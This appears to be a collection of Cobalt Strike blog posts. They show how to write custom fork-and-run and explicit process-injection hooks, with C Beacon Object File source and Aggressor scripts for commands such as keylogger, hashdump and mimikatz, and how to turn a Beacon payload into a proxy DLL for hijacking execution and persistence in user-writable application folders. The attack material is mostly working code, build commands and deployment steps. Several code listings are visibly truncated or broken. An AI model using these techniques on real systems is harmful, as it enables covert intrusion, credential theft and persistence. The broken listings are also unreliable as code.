Cobalt Strike 4.5 now supports two new Aggressor Script hooks: PROCESS_INJECT_SPAWN and PROCESS_INJECT_EXPLICIT.  These hooks allow a user to define how the fork&run and explicit injection techniques are implemented when executing post-exploitation commands instead of using the built-in techniques. 

The implementation of these techniques is through a Beacon Object File (BOF) and an Aggressor Script function.  In the next sections a simple example will be provided followed by an example from the Community Kit for each hook. 

These two hooks will cover most of the post exploitation commands, which will be listed in each section.  However, here are some exceptions which will not use these hooks. 

Beacon Command Aggressor Script function 
execute-assembly &bexecute_assembly 
Exceptions to the 4.5 process injection updates

Process Injection Spawn (Fork & Run)

The PROCESS_INJECT_SPAWN hook is used to define the fork&run process injection technique.  The following Beacon commands, aggressor script functions, and UI interfaces listed in the table below will call the hook and the user can implement their own technique or use the built-in technique. 

Additional information for a few commands: 

  1. The elevaterunasadmin, &belevate, &brunasadmin and [beacon] -> Access -> Elevate commands will only use the PROCESS_INJECT_SPAWN hook when the specified exploit uses one of the listed aggressor script functions in the table, for example &bpowerpick
  1. For the net and &bnet command the ‘domain’ command will not use the hook. 
  1. The “(use a hash)” note means select a credential that references a hash. 
Beacon Command Aggressor Script function UI Interface 
dcsync &bdcsync  
elevate &belevate [beacon] -> Access -> Elevate 
  [beacon] -> Access -> Golden Ticket 
hashdump &bhashdump [beacon] -> Access -> Dump Hashes 
keylogger &bkeylogger  
logonpasswords &blogonpasswords [beacon] -> Access -> Run Mimikatz 
  [beacon] -> Access -> Make Token (use a hash) 
mimikatz &bmimikatz   
net &bnet [beacon] -> Explore -> Net View 
portscan &bportscan [beacon] -> Explore -> Port Scan 
powerpick &bpowerpick   
printscreen &bprintscreen  
pth &bpassthehash   
runasadmin &brunasadmin  
  [target] -> Scan 
screenshot &bscreenshot [beacon] -> Explore -> Screenshot 
screenwatch &bscreenwatch  
ssh &bssh [target] -> Jump -> ssh 
ssh-key &bssh_key [target] -> Jump -> ssh-key 
  [target] -> Jump -> [exploit] (use a hash) 
Commands that support the PROCESS_INJECT_SPAWN hook in 4.5


The PROCESS_INJECT_SPAWN hook accepts the following arguments 

  • $1 Beacon ID 
  • $2 memory injectable DLL (position-independent code) 
  • $3 true/false ignore process token 
  • $4 x86/x64 – memory injectable DLL architecture 


The PROCESS_INJECT_SPAWN hook should return one of the following values: 

  • $null or empty string to use the built-in technique. 
  • 1 or any non-empty value to use your own fork&run injection technique. 

I Want to Use My Own spawn (fork & run) Injection Technique.

To implement your own fork&run injection technique you will be required to supply a BOF containing your executable code for x86 and/or x64 architectures and an Aggressor Script file containing the PROCESS_INJECT_SPAWN hook function. 

Simple Example 

The following example implements the PROCESS_INJECT_SPAWN hook to bypass the built-in default.  First, we will create a BOF with our fork&run implementation. 

File: inject_spawn.c

#include <windows.h>
#include "beacon.h"

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   STARTUPINFOA        si;
   datap               parser;
   short               ignoreToken;
   char *              dllPtr;
   int                 dllLen;

   /* Warn about crossing to another architecture. */
   if (!is_x64() && x86 == FALSE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x86 -> x64");
   if (is_x64() && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x64 -> x86");

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   ignoreToken = BeaconDataShort(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* zero out these data structures */
   __stosb((void *)&si, 0, sizeof(STARTUPINFO));
   __stosb((void *)&pi, 0, sizeof(PROCESS_INFORMATION));

   /* setup the other values in our startup info structure */
   si.wShowWindow = SW_HIDE;
   si.cb = sizeof(STARTUPINFO);

   /* Ready to go: spawn, inject and cleanup */
   if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
   BeaconInjectTemporaryProcess(&pi, dllPtr, dllLen, 0, NULL, 0);

void gox86(char * args, int alen) {
   go(args, alen, TRUE);

void gox64(char * args, int alen) {
   go(args, alen, FALSE);


  • Line 14 starts the code for the go function. This function is called via the gox86 or gox64 functions which are defined at line 53-59.  This function style is an easy way to pass the x86 boolean flag into the go function. 
  • Lines 15-20 define the variables that are referenced in the function. 
  • Lines 22-28 will check to see if runtime environment matches the x86 flag and print a warning message back to the beacon console and continue. 
  • Lines 30-33 will extract the two arguments ignoreToken and dll from the args parameter. 
  • Lines 35-42 initializes the STARTUPINFO and PARAMETER_INFO variables. 
  • Lines 44-50 implements the fork&run technique using Beacon’s internal APIs defined in beacon.h.  This is essentially the same built-in technique of spawning a temporary process, injecting the dll into the process and cleaning up. 


Next, compile the source code to generate the .o files using the mingw compiler on Linux. 

x86_64-w64-mingw32-gcc -o inject_spawn.x64.o -c inject_spawn.c 

i686-w64-mingw32-gcc -o inject_spawn.x86.o -c inject_spawn.c 

Create Aggressor Script

File: inject_spawn.cna

# Hook to allow the user to define how the fork and run process injection
# technique is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll (position-independent code)
# $3 = true/false ignore process token
# $4 = x86/x64 - memory injectable DLL arch
   local('$barch $handle $data $args $entry');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   # read in the injection BOF based on barch
   warn("read the BOF: inject_spawn. $+ $barch $+ .o");
   $handle = openf(script_resource("inject_spawn. $+ $barch $+ .o"));
   $data = readb($handle, -1);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "sb", $3, $2);

   btask($1, "Process Inject using fork and run.");

   # Set the entry point based on the dll's arch
   $entry = "go $+ $4";
   beacon_inline_execute($1, $data, $entry, $args);

   # Let the caller know the hook was implemented.
   return 1;


  • Lines 1-6 is the header information about the function and arguments. 
  • Lines 7 starts the function definition for the PROCESS_INJECT_SPAWN function. 
  • Line 8 defines the variables used in the function. 
  • Line 10-11 sets the architecture for the beacon’s session. 
  • Lines 14-17 reads the inject_spawn.<arch>.o BOF which matches the beacon’s session architecture.  This is required because beacon_inline_execute function requires the BOF architecture to match the beacon’s architecture. 
  • Lines 19-20 packs the arguments that the BOF is expecting.  In this example we are passing $3 (ignore process token) as a short and $2 (dll) as binary data. 
  • Lines 22 reports the task to Beacon. 
  • Line 25 sets up which function name to call in the BOF which is either gox86 or gox64 which is based on the dll’s architecture.  Note the beacon’s architecture and dll’s architecture do not have to match.  For example, if your Beacon is running in an x86 context on an x64 OS then some post exploitation jobs such as mimikatz will use the x64 version of the mimikatz dll. 
  • Line 26 uses the beacon_inline_execute function to execute the BOF. 
  • Line 29 returns 1 to indicate the PROCESS_INJECT_SPAWN function was implemented. 

Load the Aggressor Script and Begin Using the updated HOOK

Next, load the inject_spawn.cna Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the screenshot Command

After loading the script, a command like screenshot will use the new hook.

screenshot command using the PROCESS_INJECT_SPAWN hook
Output in the script console when reading the BOF


Example from the Community Kit

Now that we have gone through the simple example to get some understanding of how the PROCESS_INJECT_SPAWN hook works let’s try something from the Community Kit. The example which will be used is from the BOFs project  For the fork&run implementation use the example under the StaticSyscallsAPCSpawn folder. This uses the spawn with syscalls shellcode injection (NtMapViewOfSection -> NtQueueApcThread) technique.


  1. Clone or download the source for the BOF project. 
  2. Change directory into the StaticSyscallsAPCSpawn directory 
  3. Review the code within the directory to understand what is being done. 
  4. Compile the object file with the following command. (Optionally use make) 
x86_64-w64-mingw32-gcc -o syscallsapcspawn.x64.o -c entry.c -masm=intel 

When using projects from the Community Kit it is good practice to review the code and recompile the source even if object or binary files are provided.

Items to note in the entry.c file that are different than the simple example. 

  1. For this BOF notice that the entry point is ‘go’, which is different than ‘gox86’ or ‘gox64’. 
  2. The argument that this BOF expects is the dll.  The ignoreToken is not used. 
  3. Calls a function named SpawnProcess, which will use the Beacon API function BeaconSpawnTemporaryProcess.  In this case the x86 parameter is hard coded to FALSE and the ignoreToken is hard coded to TRUE. 
  4. Calls a function named InjectShellcode, which implements their injection technique instead of using the function BeaconInjectTemporaryProcess. 
  5. Finally call the Beacon API function BeaconCleanupProcess. 

Now that we understand the differences between the simple example and this project’s code, we can modify the PROCESS_INJECT_SPAWN function from the simple example to work with this project.  Here is the modified PROCESS_INJECT_SPAWN function which can be put into a new file or add it to the existing static_syscalls_apc_spawn.cna file. 

File: static_syscalls_apc_spawn.cna 

    # Hook to allow the user to define how the fork and run process injection 
    # technique is implemented when executing post exploitation commands. 
    # $1 = Beacon ID 
    # $2 = memory injectable dll (position-independent code) 
    # $3 = true/false ignore process token 
    # $4 = x86/x64 - memory injectable DLL arch 
    local('$barch, $handle $data $args'); 
        # figure out the arch of this session 
        $barch  = barch($1); 
        if ($barch eq "x86") { 
            warn("Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500) does not support x86. Use built in default"); 
            return $null; 
        # read in the right BOF 
        warn("read the BOF: syscallsapcspawn. $+ $barch $+ .o"); 
        $handle = openf(script_resource("syscallsapcspawn. $+ $barch $+ .o")); 
        $data = readb($handle, -1); 
        # pack our arguments needed for the BOF 
        $args = bof_pack($1, "b", $2); 
        btask($1, "Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)"); 
        beacon_inline_execute($1, $data, "go", $args); 
        # Let the caller know the hook was implemented. 
        return 1; 


  • Lines 1-6 is the header information about the function and arguments. 
  • Lines 7 starts the function definition for the PROCESS_INJECT_SPAWN function. 
  • Line 9 defines the variables used in the function. In this example we do not need the $entry variable as the entry point will just be “go” 
  • Line 12 will set the $barch to the beacon’s architecture. 
  • Line 14-17 is added in this example because this project is only supporting x64 architecture injection.  When an x86 architecture is detected then return $null to use the built-in technique. 
  • Line 19-23 will read the syscallsapcspawn.<arch>.o BOF which matches the beacon’s session architecture.  This is required because Beacon_inline_execute function requires the BOF architecture to match the beacon’s architecture. 
  • Lines 25-26 packs the arguments that the BOF is expecting.  In this example we are passing $2 (dll) as a binary data.  Recall the ignore Token flag was hard coded to TRUE. 
  • Line 28 uses the beacon_inline_execute function to execute the BOF.  In this case just call “go” since the requirement of knowing if it is x86 or x64 is not needed as the x86 flag is hard coded to FALSE. 
  • Line 33 returns 1 to indicate the PROCESS_INJECT_SPAWN function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the keylogger Command

After loading the script, a command like keylogger will use the new hook.

keylogger command using the PROCESS_INJECT_SPAWN hook
Output in the script console when reading the BOF

Explicit Process Injection (Put Down That Fork)

The PROCESS_INJECT_EXPLICIT hook is used to define the explicit process injection technique.  The following Beacon commands, aggressor script functions, and UI interfaces listed in the table below will call the hook and the user can implement their own technique or use the built-in technique. 

Additional information for a few commands: 

  1. The [Process Browser] interface is accessed by [beacon] -> Explore -> Process List.  There is also a multi version of this interface which is accessed by selecting multiple beacon sessions and using the same UI menu.  When in the Process Browser use the buttons to perform additional commands on the selected process. 
  1. The chromedumpdcsynchashdumpkeyloggerlogonpasswordsmimikatznetportscanprintscreenpthscreenshotscreenwatchssh, and ssh-key commands also have a fork&run version.  To use the explicit version requires the pid and architecture arguments. 
  1. For the net and &bnet command the ‘domain’ command will not use the hook. 
Beacon Command Aggressor Script function  UI Interface 
browserpivot &bbrowserpivot [beacon] -> Explore -> Browser Pivot 
dcsync &bdcsync  
dllinject &bdllinject  
hashdump &bhashdump  
inject &binject [Process Browser] -> Inject 
keylogger &bkeylogger [Process Browser] -> Log Keystrokes 
logonpasswords &blogonpasswords  
mimikatz &bmimikatz  
net &bnet  
portscan &bportscan  
psinject &bpsinject  
pth &bpassthehash  
screenshot  [Process Browser] -> Screenshot (Yes) 
screenwatch  [Process Browser] -> Screenshot (No) 
shinject &bshinject  
ssh &bssh  
ssh-key &bssh_key  
Commands that support the PROCESS_INJECT_EXPLICIT hook in 4.5


The PROCESS_INJECT_EXPLICIT hook accepts the following arguments 

  • $1 Beacon ID 
  • $2 memory injectable DLL (position-independent code) 
  • $3 = the PID to inject into 
  • $4 = offset to jump to 
  • $5 = x86/x64 – memory injectable DLL arch 


The PROCESS_INJECT_EXPLICIT hook should return one of the following values: 

  • $null or empty string to use the built-in technique. 
  • 1 or any non-empty value to use your own explicit injection technique. 

I Want to Use My Own Explicit Injection Technique.

To implement your own explicit injection technique, you will be required to supply a BOF containing your executable code for x86 and/or x64 architectures and an Aggressor Script file containing the PROCESS_INJECT_EXPLICIT hook function. 

Simple Example 

The following example implements the PROCESS_INJECT_EXPLICIT hook to bypass the built-in default.  First, we will create a BOF with our explicit injection implementation. 

File: inject_explicit.c

#include <windows.h>
#include "beacon.h"

/* Windows API calls */

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;

/* is this a 64-bit or 32-bit process? */
BOOL is_wow64(HANDLE process) {
   BOOL bIsWow64 = FALSE;

   if (!KERNEL32$IsWow64Process(process, &bIsWow64)) {
      return FALSE;
   return bIsWow64;

/* check if a process is x64 or not */
BOOL is_x64_process(HANDLE process) {
   if (is_x64() || is_wow64(KERNEL32$GetCurrentProcess())) {
      return !is_wow64(process);

   return FALSE;

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   HANDLE              hProcess;
   datap               parser;
   int                 pid;
   int                 offset;
   char *              dllPtr;
   int                 dllLen;

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   pid = BeaconDataInt(&parser);
   offset = BeaconDataInt(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* Open a handle to the process, for injection. */
   if (hProcess == INVALID_HANDLE_VALUE || hProcess == 0) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to open process %d : %d", pid, KERNEL32$GetLastError());

   /* Check that we can inject the content into the process. */
   if (!is_x64_process(hProcess) && x86 == FALSE ) {
      BeaconPrintf(CALLBACK_ERROR, "%d is an x86 process (can't inject x64 content)", pid);
   if (is_x64_process(hProcess) && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "%d is an x64 process (can't inject x86 content)", pid);

   /* inject into the process */
   BeaconInjectProcess(hProcess, pid, dllPtr, dllLen, offset, NULL, 0);

   /* Clean up */

void gox86(char * args, int alen) {
   go(args, alen, TRUE);

void gox64(char * args, int alen) {
   go(args, alen, FALSE);


  • Lines 1-2 are the include files, where beacon.h can be downloaded from
  • Lines 4-9 define the prototypes for the Dynamic Function Resolution for a BOF. 
  • Lines 11-18 define a function to determine the compiled architecture type. 
  • Lines 20-37 define functions to determine the architecture of the process to inject into. 
  • Line 40 starts the code for the go function. This function is called via the gox86 or gox64 functions which are defined at line 78-84.  This function style is an easy way to pass the x86 boolean flag into the go function. 
  • Lines 41-46 define the variables that are referenced in the function. 
  • Lines 48-52 will extract the three arguments pid, offset and dll from the args parameter. 
  • Lines 55-59 will open the process for the specified pid. 
  • Lines 61-69 will verify if the content can be injected into the process. 
  • Line 72 implements the explicit injection technique using Beacon’s internal APIs defined in beacon.h.  This is the same built-in technique for injecting into a process. 
  • Lines 75 will close the handle to the process. 


Next, compile the source code to generate the .o files using the mingw compiler on Linux. 

x86_64-w64-mingw32-gcc -o inject_explicit.x64.o -c inject_explicit.c 

i686-w64-mingw32-gcc -o inject_explicit.x86.o -c inject_explicit.c 

Create Aggressor Script

Next, create the Aggressor Script PROCESS_INJECT_EXPLICIT hook function. 

File: inject_explicit.cna

# Hook to allow the user to define how the explicit injection technique
# is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll for the post exploitation command
# $3 = the PID to inject into
# $4 = offset to jump to
# $5 = x86/x64 - memory injectable DLL arch
   local('$barch $handle $data $args $entry');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   # read in the injection BOF based on barch
   warn("read the BOF: inject_explicit. $+ $barch $+ .o");
   $handle = openf(script_resource("inject_explicit. $+ $barch $+ .o"));
   $data = readb($handle, -1);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "iib", $3, $4, $2);

   btask($1, "Process Inject using explicit injection into pid $3");

   # Set the entry point based on the dll's arch
   $entry = "go $+ $5";
   beacon_inline_execute($1, $data, $entry, $args);

   # Let the caller know the hook was implemented.
   return 1;


  • Lines 1-7 contains the header information about the function and arguments. 
  • Lines 8 starts the function definition for the PROCESS_INJECT_EXPLICIT function. 
  • Line 9 defines the variables used in the function. 
  • Line 12 sets the architecture for the Beacon’s session. 
  • Lines 15-18 reads the inject_explicit.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Line 21 packs the arguments that the BOF is expecting.  In this example we are passing $3 (pid) as an integer, $4 (offset) as an integer, and $2 (dll) as binary data. 
  • Lines 23 reports the task to Beacon. 
  • Line 26 sets up which function name to call in the BOF which is either gox86 or gox64 which is based on the dll’s architecture.  Note the Beacon’s architecture and dll’s architecture do not have to match. 
  • Line 27 uses the beacon_inline_execute function to execute the BOF. 
  • Line 30 returns 1 to indicate the PROCESS_INJECT_EXPLICIT function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the inject_explicit.cna Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the screenshot Command

After loading the script, a command like screenshot will use the new hook.

screenshot command using the PROCESS_INJECT_EXPLICIT hook
Output in the script console when reading the BOF


Example from the Community Kit

Now that we have gone through the simple example to get some understanding of how the PROCESS_INJECT_EXPLICIT hook works let’s try something from the Community Kit. The example which will be used is from the BOFs project  For the explicit injection implementation we will select a different technique from this repository. Use the example under the StaticSyscallsInject folder. 


  1. Clone or download the source for the BOF project. 
  2. Change directory into the StaticSyscallsInject directory 
  3. Review the code within the directory to understand what is being done. 
  4. Compile the object file with the following command. (Optionally use make) 
x86_64-w64-mingw32-gcc -o syscallsinject.x64.o -c entry.c -masm=intel 

When using projects from the Community Kit it is good practice to review the code and recompile the source even if object or binary files are provided

Items to note in the entry.c file that are different than the simple example. 

  1. For this BOF notice that the entry point is ‘go’, which is different than ‘gox86’ or ‘gox64’. 
  2. The arguments that this BOF expects are the pid and dll.  The offset is not used. 
  3. Calls a function named InjectShellcode, which implements their injection technique instead. 
  4. Opens the Process 
  5. Allocates Memory and Copies it to the Process 
  6. Create the thread and wait for completion 
  7. Cleanup 

Now that we understand the differences between the simple example and this project’s code, we can modify the PROCESS_INJECT_EXPLICIT function from the simple example to work with this project.  Here is the modified PROCESS_INJECT_EXPLICIT function which can be put into a new file or add it to the existing static_syscalls_inject.cna file. 

File: static_syscalls_inject.cna

# Hook to allow the user to define how the explicit injection technique 
# is implemented when executing post exploitation commands. 
# $1 = Beacon ID 
# $2 = memory injectable dll for the post exploitation command 
# $3 = the PID to inject into 
# $4 = offset to jump to 
# $5 = x86/x64 - memory injectable DLL arch 
local('$barch $handle $data $args'); 

# Set the architecture for the beacon's session 
$barch = barch($1); 

if ($barch eq "x86") { 
    warn("Static Syscalls Shellcode Injection BOF (@ajpc500) does not support x86. Use built in default"); 
    return $null; 

if ($4 > 0) { 
    warn("Static Syscalls Shellcode Injection BOF (@ajpc500) does not support offset argument. Use built in default"); 
    return $null; 

# read in the injection BOF based on barch 
warn("read the BOF: syscallsinject. $+ $barch $+ .o"); 
$handle = openf(script_resource("syscallsinject. $+ $barch $+ .o")); 
$data = readb($handle, -1); 

# pack our arguments needed for the BOF 
$args = bof_pack($1, "ib", $3, $2); 

btask($1, "Static Syscalls Shellcode Injection BOF (@ajpc500) into pid $3"); 

beacon_inline_execute($1, $data, "go", $args); 

# Let the caller know the hook was implemented. 
return 1; 


  • Lines 1-7 contains the header information about the function and arguments. 
  • Lines 8 starts the function definition for the PROCESS_INJECT_EXPLICIT function. 
  • Line 9 defines the variables used in the function. 
  • Line 12 sets the architecture for the Beacon’s session. 
  • Line 14-17 is added in this example because this project is only supporting x64 architecture injection.  When an x86 architecture is detected then return $null to use the built-in technique. 
  • Line 19-22 is added in this example because this project is not supporting the offset to jump to argument.  When this is detected then return $null to use the built-in technique. 
  • Lines 25-28 reads the syscallsinject.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Line 31 packs the arguments that the BOF is expecting.  In this example we are passing $3 (pid) as an integer, and $2 (dll) as binary data. 
  • Lines 33 reports the task to Beacon. 
  • Line 35 uses the beacon_inline_execute function to execute the BOF. 
  • Line 38 returns 1 to indicate the PROCESS_INJECT_EXPLICIT function was implemented. 

Next, load the Aggressor Script file into the Cobalt Strike client through the Colbalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the keylogger Command

After loading the script, a command like keylogger will use the new hook.

keylogger command using the PROCESS_INJECT_EXPLICIT hook
Output in the script console when reading the BOF


Create a proxy DLL with artifact kit

DLL attacks (hijacking, proxying, etc) are a challenge defenders must face. They can be leveraged in a Red Team engagement to help measure these defenses. Have you used this technique? In this post, I’ll walk through an example of adding a DLL proxy to beacon.dll for use in a DLL Proxy attack.

What is a DLL Proxying?

To begin with, this is not a new technique. I’ve seen it used some, but not always understood in practice. Other DLL hijacking attacks tend to be used more often, but Red Teams can benefit by adding this technique to their toolbox.

DLL proxying is an attack that falls in the DLL hijacking category.

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program.

MITRE ATT&CK defines this as Hijack Execution Flow: DLL Search Order Hijacking.

A common way this is abused is to find a process that loads a “ghost” DLL. This is a DLL that is called by the process, but doesn’t actually exist. The calling process ignores this and continues. An attacker can add their own DLL in place of this ghost DLL. This works great, but can be rare.

What if you could modify an existing DLL without breaking the application that depends on that functionality?

This is DLL proxying. It allows an attacker to hijack the execution flow of a process but keep the original functionality of the application. Let’s walk through the attack flow.

DLL Proxy Attack Flow Diagram

Let’s say some process uses math.dll to perform calculations. Someprocess.exe loads math.dll and makes calls to its exported functions as needed. This is why we use external libraries.

If we want to hijack this process, we could easily replace math.dll with something malicious, but this would break the application. We don’t want that. This may draw attention to what we are doing. We need to copy math.dll to original.dll. Replace math.dll with a version that will forward the the legitimate calls to the new original.dll. And finally, use math.dll to load whatever malicious function we want.

In order to do this we need…

  1. The ability to create and write files
  2. The ability to find a target DLL that is loaded by an application
  3. The ability to extract the exports from a target DLL
  4. The ability to create a DLL that will ‘proxy’ the original exports to a copy of the original DLL

The post is using one technique for DLL proxying to specifically show how to use artifact kit to create this proxy DLL. There are several projects that explore this concept. A quick search can yield a wealth of resources on the topic. One of particular interest is the DueDLLigence project. It is an interesting approach that uses a framework to easily allow the development malicious DLLs.

Let’s Start with a Simple DLL Proxy Example

Let’s walk through a simple example to help clear this up.

This example uses code that can be found here.

In this example we assume that the hello.dll is the DLL being call by our target process. It will become the target of our proxy attack. This is similar to math.dll in the diagram.

Steps to find, build, and use a proxy DLL

1) Understand the execution flow of a process to understand which DLLs are loaded.

We need to start by understanding which DLLs are loaded by a process. The sysinternals tool process explorer works great here.

Real World Tip

I won’t call out any vendor here. My examples simply use rundll32.exe as my ‘application’. Just consider rundll32.exe some real target (maybe a chat application) that uses hello.dll.

The AppData directory is a great place to find candidates for user level persistence. Unlike C:\Program Files, c:\users\USER\AppData is user controlled. Many applications are installed here. cough, cough, chat clients.

A quick tip on using process explorer is to filter out what you need before running. In this case, I only want to see Load Image from my target process.

Procmon Filter

To simulate an application starting up and making calls to its DLLs, I use:

rundll32.exe hello.dll, hello

to have rundll32 call the hello function.

rundll32 loads hello.dll and calls the hello function

In the process explorer output, we see that our application loads hello.dll


Great, we found a candidate DLL in our target application.

Another option to search for targets is to use the DLL_Imports_BOF. This project allows you to search for target applications during an engagement.

This is a BOF to enumerate DLL files to-be-loaded by a given PE file. Depending on the number of arguments, this will allow an operator to either view a listing of anticipated imported DLL files, or to view the imported functions for an anticipated DLL.

No matter what you use, the goal is to understand what DLLs are in play and what exports those DLLs use.

2) Identify the DLL exports.

DLL exports are the functions that an external process can call to use that functionality. It is a core feature of a DLL.

Look at the exports of hello.dll:

If you are following along, compile hello.dll:

x86_64-w64-mingw32-gcc -m64 -c -Os hello.c -Wall -shared -masm=intel
x86_64-w64-mingw32-dllwrap -m64 --def hello.def hello.o -o hello.dll

There are several ways to get the exported function from a DLL.

I included a simple python script,, to extract the exports and format for use in a .def file.

python3 --target hello.dll output

You can also use something like dumpbin from Visual Studio

dumpbin /exports hello.dll
dumpbin output

The point of this is to get a list of the legitimate exported functions from the target DLL. This will give us what we need to build our proxy.

3) Build the proxy.dll.

In this example, I’m writing a proxy in .C to be compiled with MinGW. This shows the process, but could be very different depending on how you build your DLL. No matter what you do, you will be generating a DLL that forward functions.

Add the exported functions to proxy.def:

proxy.def updated with the hello.dll functions

A module-definition or DEF file (*.def) is a text file containing one or more module statements that describe various attributes of a DLL. If you are not using the __declspec(dllexport) keyword to export the DLL’s functions, the DLL requires a DEF file.

Let’s break down the export hello=original.hello @1:

This is creating the “hello” export for proxy.dll. Calls made to this function are forwarded to the hello function in original.dll. The @1 is the ordinal. (Ordinals are another way a function may be called. It does not always need to match, but can help if ordinals are used.)


proxy.c is a very basic DLL. It will run the payload function and if a remote target calls a remote function, it will proxy based on the exports set in proxy.def. The payload function is blocking. This is just a simple example. You should create a thread or use some other non-blocking method.

We are ready to compile proxy.dll

x86_64-w64-mingw32-gcc -m64 -c -Os  proxy.c -Wall -shared -masm=intel
x86_64-w64-mingw32-dllwrap -m64 --def proxy.def proxy.o -o proxy.dll

4) Move the files to the target.

To simulate a real attack you must:

  • rename the original dll (hello.dll) to original.dll or what you set in the proxy.def file.
  • rename proxy.dll to the original file name (hello.dll)

Output after moving and naming the files on the target system.

Directory of Y:\temp\proxydll

10/28/2021  01:53 PM    <DIR>          .
10/28/2021  01:37 PM    <DIR>          ..
10/28/2021  01:37 PM           280,185 hello.dll    <- This was proxy.dll
10/28/2021  01:23 PM           280,167 original.dll <- This was hello.dll

5) Test the proxy.

Let’s simulate some process following its normal process of loading hello.dll and calling the hello function by using rundll32.exe.

The following command acts more or less the same as an application starting, loading a DLL, and calling a function from that DLL.

rundll32 hello.dll, hello
The payload function from the proxy DLL
The hello function from the original DLL

We called the proxy DLL (hello.dll) using rundll32 as an example target for a DLL loading attack. It executed our payload function and the original function.

That’s it. There really isn’t much to this attack, but it can be very effective. A proxy DLL is just a DLL that proxies legitimate calls and runs your own payload. Proxy attacks allow an attacker to hijack execution flow but keep the original functionality of the application.

Let’s extend this to the Cobalt Strike Artifact Kit

Licensed users of Cobalt Strike have access to the artifact kit. This kit provide a way to modify several aspects of the .exe or .dll beacon payloads. Think of this as a beacon ‘loader’. The kit can be loaded by Cobalt Strike as an aggressor script to update how .exe or .dll payloads are built.

Now that we know the primitives from our example, we can easily update kit with the changes needed to convert beacon.dll into a proxy.

Modify the file src-main/dllmain.def by adding hello=original.hello @1 as an export option. This is the same as what was done in the example.

Build the kit using the script. By default, this will compile all kit techniques. Let it build them all. We will pick one to load.

Load the artifact kit aggressor script to tell Cobalt Strike to use the newly create template when building a payload. In this case we will use the ‘pipe’ technique. The aggressor script can be found in dist-pipe/artifact.cna after the build is complete.

Cobalt Strike -> Script Manager
Load -> dist-pipe/artifact.cna

Generate a Beacon DLL payload

Attacks -> Packages -> Windows Executable (S)

Listener: Choose Your listener
Output:   Windows DLL
x64:      X

Click Generate and save as hello.dll.

Remember, this is the proxy DLL. It will replace the target DLL and the the target DLL will be renamed to original.dll.

Modified version of artifact.cna to output messages to the script console when the artifact kit is used

Let’s take a look at this beacon DLL payload (hello.dll):

dumpbin /exports hello.dll
exports of hello.dll (proxy)

We see the DLL has the default exports for beacon.dll and the new forwarding export.

Let’s test as we did before by using rundll32 as the target process that we want to attack.

rundll32 hello.dll, hello
Received a new beacon

hello.dll runs the beacon payload, and the hello function call was successfully proxied.

At this point, we turned beacon.dll in a proxy.

What Next?

This example only shows how to make beacon a DLL proxy. The artifact kit is a way to customize beacon.exe or beacon.dll. It can be used to help bypass AV/EDR. Consider exploring the possibilities of using the kit. Or, forget the artifact kit altogether and write your own beacon loader as a proxy DLL.

Using rundll32 isn’t exciting, but the attack technique itself is a great method for persistence. Many applications are installed in


This directory is writable by the user (vs something like c:\program files). This means an attacker with control over a target can find a target process and create a proxy DLL for that target. Take a look at the application installed in AppData, you may find a nice target.

Defensive Considerations

A great preventative control for this attack is for applications to validate the DLLs it loads. If a rouge/untrusted DLL is used, the application will not allow it to execute. During the writing of this post, I tested by targeting a popular chat application. It used digital signatures to validate the loaded DLLs. This worked great, except the user was presented with a popup asking if they would like to run the “untrusted” code. Clicking OK allowed my payload to run (partial win?). Prevention is great, be we need to ensure we can detect attacks when it fails.

Do not allow user controlled applications to be installed in user controlled directories. Install applications in directories the user can use but not modify (i.e., C:\Program Files).

File integrity monitoring may help.

Fortunately, the payloads executed from this attack the same. The proxy DLL is just a loader. The payloads executed by this loader may be detected through the normal means of a robust security operations program.


CredBandit (In memory BOF MiniDump) – Tool review – Part 1

